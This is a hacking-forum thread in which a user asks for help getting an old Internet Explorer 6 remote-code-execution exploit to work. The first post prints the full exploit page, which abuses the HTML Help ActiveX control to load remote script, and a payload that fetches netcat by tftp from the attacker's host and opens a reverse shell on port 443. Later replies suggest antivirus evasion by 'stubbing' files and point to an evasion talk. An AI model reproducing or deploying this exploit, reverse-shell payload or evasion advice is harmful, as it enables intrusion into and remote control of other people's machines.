Results 1 to 10 of 16

Thread: Code Execution

Hybrid View

  1. #1
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default Code Execution

    Could someone shed some light?

    I'm now trying to recreate the code execution exploit for IE 6.0 in a XP-SP2 box.

    I get the following error when I browse to the malicious web site:

    Code:
    An error has occured in the script onthis page.
    
    Line:  4
    Char:  1
    Error: Invalid character
    Code:  0
    URL:   ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm
    
    Do you want to continue running scripts on this page?
    This is the htm code in my page:

    Code:
    <!-- 
    Download this file as well for your own testing:  original htm.txt
    http://www.milw0rm.com/down.php?id=723
    
    //str0ke
    -->  
    
    <html><head><title>CMDExe - Windows Exploit - Remote code execution with parameters - Proof of Concept</title></head><BODY style="font-family:Verdana;color:#0000FF;font-size:14px">More info about this exploit can be found at <a href="http://freehost19.websamba.com/shreddersub7/expl-discuss.htm" target="_new">hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm</a>. ? 2004 ShredderSub7
    <script>
      function DisplayLocStrings() {
        Title.innerHTML = TAG_SYSCONFIG;
        Config_Link.innerHTML = TAG_OPENSYSCONFIG;
        Config_Desc.innerHTML = TAG_SYSCONFIGDESC;
      }
      </script>
    <br><OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
    <PARAM name="Command" value="Related Topics, MENU">
    <PARAM name="Button" value="Text:_">
    <PARAM name="Window" value="$global_blank">
    <PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
    </OBJECT>
    <OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
    <PARAM name="Command" value="Related Topics, MENU">
    <PARAM name="Button" value="Text:_">
    <PARAM name="Window" value="$global_blank">
    <PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"javascript\\\" src=\\\"http://10.10.52.20/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
    
    </OBJECT>
    <script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>
    
    // milw0rm.com [2004-12-28]
    This is the code in my htm.txt

    Code:
    document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/c tftp -i 10.10.52.20 GET nc.exe && nc.exe 10.10.52.20 443 -e cmd.exe && taskkill /f /im cmd.exe,'></object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");
    
    # milw0rm.com [2004-12-28]
    When the error occurs I choose yes for it to continue to run the code but it doesn't seem to continue, because I get no shell on my attacking machine...and yes I have netcat listening on port 443.

    Could someone help?

  2. #2
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Try removing some comments ... I don't think that some of those comments are for htm/l

  3. #3
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Thanks The_Denv

    I will try it out. I belive it might have something to do with it, because when I deleted the comments and tried to save it, the AV came up and deleted the file....

    Darnnnnnn AV

  4. #4
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Quote Originally Posted by Armagedeon View Post
    Thanks The_Denv

    I will try it out. I belive it might have something to do with it, because when I deleted the comments and tried to save it, the AV came up and deleted the file....

    Darnnnnnn AV
    Nice one, sounds like it worked.
    Listen, if you do not want any type of file being detected by an AV such as AVG; stub the file. muts did a presentation at SmooCon about it. Rather than linking you directly to the video, here is a thread on 'I piss on your AV' within remote-exploit discussing the video:
    http://forums.remote-exploit.org/showthread.php?t=12353

    Goodluck

  5. #5
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Hi there The_Denv

    Funny you mention this I have that video... I belive it is in rapidshare... :
    I've been trying to download ncx99.exe, the aplication used in the video but the f#%$&#" AV doesn´t let me
    I belive that even LordPE pissed him off Dammm AV...

  6. #6
    Junior Member Armagedeon's Avatar
    Join Date
    Feb 2008
    Posts
    86

    Default

    Thorn

    For real ???????

    I'm browsing with IE in a windows machine, AV is Trend, and it doesn't complaint...

    I'm sorry If I caused any problems

    What can I do to remedy this?

  7. #7
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    For what it's worth, something has to be correct. NAV won't even allow this RE Forums page to load on a Windows machine in either FF or IE, as it detects the code.

    I had to jump to a Linux latptop to see what was posted here.
    Thorn
    Stop the TSA now! Boycott the airlines.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •